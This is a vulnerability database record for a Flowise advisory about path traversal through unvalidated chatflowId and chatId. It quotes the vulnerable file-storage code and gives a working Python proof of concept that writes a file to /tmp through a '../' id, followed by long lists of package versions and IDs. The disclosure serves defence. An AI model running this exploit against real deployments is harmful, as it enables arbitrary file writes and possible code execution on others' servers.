{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360549?format=json","vulnerability_id":"VCID-g7y6-euhd-jqhh","summary":"Flowise has arbitrary file access due to missing chat flow id validation\n### Summary\n\nMissing chat flow id validation allows an attacker to access arbitrary files.\n\n### Details\n\nCommits https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added a check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from the route `/api/v1/attachments`. In some cases, however, `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.\n\n**Case 1**\n\nWhen creating a new chatflow via `/api/v1/chatflows`, the function `addBase64FilesToStorage` is called if base64 file data is present. Although the `filename` is sanitized, the `chatflowid` comes directly from the request body without any validation. An attacker could exploit the path traversal here to write arbitrary files with controlled data.\n\n```typescript\nexport const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {\n    // ...\n    } else {\n        const dir = path.join(getStoragePath(), chatflowid)  // path traversal here\n        if (!fs.existsSync(dir)) {\n            fs.mkdirSync(dir, { recursive: true })\n        }\n\n        const splitDataURI = fileBase64.split(',')\n        const filename = splitDataURI.pop()?.split(':')[1] ?? 
''\n        const bf = Buffer.from(splitDataURI.pop() || '', 'base64')\n        const sanitizedFilename = _sanitizeFilename(filename)\n\n        const filePath = path.join(dir, sanitizedFilename)\n        fs.writeFileSync(filePath, bf)\n        fileNames.push(sanitizedFilename)\n        return 'FILE-STORAGE::' + JSON.stringify(fileNames)\n    }\n}\n```\n\n**Case 2**\n\nWhen downloading a file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, the function `streamStorageFile` is called to retrieve file data from local storage or a cloud bucket. The `chatflowId` and `chatId` are used to generate the file path. Taking Amazon S3 as an example, its [documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as a relative path.\n\nNote that these APIs are in `WHITELIST_URLS`, so an attacker may traverse user storage files without authentication.\n\n### PoC\n\nLaunch the app at localhost with the default config, then run the following Python script; a file named 'pwn' will be written to the directory `/tmp` with the content 'Hello, World!'.\n\n```python\nimport requests\nimport json\nurl = \"http://localhost:8080/api/v1/chatflows\"\nheaders = {\"x-request-from\": \"internal\"}\nnodedata = {\n  \"category\" : \"Document Loaders\",\n  \"inputs\" : {\n    \"key\" : \"data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn\"\n  }\n}\nflownode = {\n  \"id\" : \"a\",\n  \"data\" : nodedata\n}\nflowdata = {\n  \"nodes\" : [flownode],\n  \"edges\" : [],\n  \"viewport\" : {\n    \"x\" : 1,\n    \"y\" : 1,\n    \"zoom\" : 1\n  }\n}\ndata = {\n  \"id\" : \"../../../../../tmp\",\n  \"name\" : \"name\",\n  \"flowData\" : json.dumps(flowdata)\n}\nres = requests.post(url, json=data, headers=headers)\n```\n\n### Impact\n\n1. Arbitrary file read / write\n2. Remote Code Execution\n3. 
Data loss","aliases":[{"alias":"GHSA-q67q-549q-p849"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/34612?format=json","purl":"pkg:npm/flowise@3.0.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerabi
lity":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"}],"affected_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/395072?format=json","purl":"pkg:npm/flowise@2.2.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-e
uhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@2.2.8"},{"url":"http://public2.vulnerablecode.io/api/packages/823706?format=json","purl":"pkg:npm/flowise@3.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d
346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-b
yj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/34324?format=json","purl":"pkg:npm/flowise@3.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u
39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-u91w-qe9z-rfg4"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.1"},{"url":"http://public2.vulnerablecode.io/api/packages/823707?format=json","purl":"pkg:npm/flowise@3.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9
mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.2"},{"url":"http://public2.vulnerablecode.io/api/packages/823708?format=json","purl":"pkg:npm/flowise@3.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-um
g6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-euhd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-ey
dz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/823709?format=json","purl":"pkg:npm/flowise@3.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy4-ykep"},{"vulnerability":"VCID-6ufs-d346-d7ev"},{"vulnerability":"VCID-6wat-8akx-hycz"},{"vulnerability":"VCID-71uq-yx2j-cqak"},{"vulnerability":"VCID-9bht-svq8-87b4"},{"vulnerability":"VCID-9rqv-p7rz-5kar"},{"vulnerability":"VCID-a1e4-f5dh-w3a5"},{"vulnerability":"VCID-abyp-yn76-1yfp"},{"vulnerability":"VCID-affy-v76q-fub6"},{"vulnerability":"VCID-aqg8-6us7-uqef"},{"vulnerability":"VCID-b97u-efzx-dffn"},{"vulnerability":"VCID-bkmk-k9mn-ekhx"},{"vulnerability":"VCID-cb6d-4c2v-w7c3"},{"vulnerability":"VCID-cxja-9yxc-k7au"},{"vulnerability":"VCID-d4wa-szeh-43ab"},{"vulnerability":"VCID-dtss-epth-z7fh"},{"vulnerability":"VCID-dzed-27rk-3qav"},{"vulnerability":"VCID-e65e-s5sd-kuhp"},{"vulnerability":"VCID-ejdc-j73x-jydk"},{"vulnerability":"VCID-fje6-knjc-nfgf"},{"vulnerability":"VCID-fu6t-9dk4-jbh9"},{"vulnerability":"VCID-g7y6-eu
hd-jqhh"},{"vulnerability":"VCID-gt6n-beak-33gy"},{"vulnerability":"VCID-gvpx-4wkw-43cz"},{"vulnerability":"VCID-hdej-umwh-kqav"},{"vulnerability":"VCID-hkfs-v3bp-kbh5"},{"vulnerability":"VCID-j5hh-haj2-qydg"},{"vulnerability":"VCID-jcze-eg2c-mkcf"},{"vulnerability":"VCID-jmps-anck-eqdt"},{"vulnerability":"VCID-k579-xd81-hqdu"},{"vulnerability":"VCID-kpyg-gve3-b3av"},{"vulnerability":"VCID-ksmv-s6c9-t7ap"},{"vulnerability":"VCID-m3j3-4u39-euht"},{"vulnerability":"VCID-pzza-9xq9-a7de"},{"vulnerability":"VCID-qgs1-hazv-67b8"},{"vulnerability":"VCID-qm89-q2ar-uyhy"},{"vulnerability":"VCID-r74e-k86f-7qgb"},{"vulnerability":"VCID-rgmv-6bqh-eqf2"},{"vulnerability":"VCID-rkaz-75t9-r3gs"},{"vulnerability":"VCID-s3jg-wce1-fbf3"},{"vulnerability":"VCID-t5jg-qrw2-aqcv"},{"vulnerability":"VCID-t839-eydz-1ud4"},{"vulnerability":"VCID-tdm1-91mc-8kgr"},{"vulnerability":"VCID-v1nz-wwsu-qycg"},{"vulnerability":"VCID-v9hg-7pex-g3dp"},{"vulnerability":"VCID-w9yr-5jbp-q7fm"},{"vulnerability":"VCID-wg28-w8vn-ybb5"},{"vulnerability":"VCID-xt1d-efw7-g3c6"},{"vulnerability":"VCID-ywgu-76cy-uqe7"},{"vulnerability":"VCID-z1y2-f2ws-8ycb"},{"vulnerability":"VCID-zbrd-qdty-2bfs"},{"vulnerability":"VCID-zwna-stj5-3yhm"},{"vulnerability":"VCID-zwz7-byj4-6qan"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.4"},{"url":"http://public2.vulnerablecode.io/api/packages/34083?format=json","purl":"pkg:npm/flowise@3.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-14af-nhf3-aqba"},{"vulnerability":"VCID-17k4-psgt-sydg"},{"vulnerability":"VCID-19jc-umg6-v7ce"},{"vulnerability":"VCID-1xfp-4rtg-4bcu"},{"vulnerability":"VCID-2891-vddv-ebff"},{"vulnerability":"VCID-39aw-3gc6-bkgb"},{"vulnerability":"VCID-3chx-dj2u-kbab"},{"vulnerability":"VCID-3gp6-wwtd-kkf1"},{"vulnerability":"VCID-488c-vrqu-f7hf"},{"vulnerability":"VCID-5hdy-fsnn-qfgq"},{"vulnerability":"VCID-5j9e-bcr5-n7bs"},{"vulnerability":"VCID-5pup-kgaf-3ubw"},{"vulnerability":"VCID-67mz-pfy
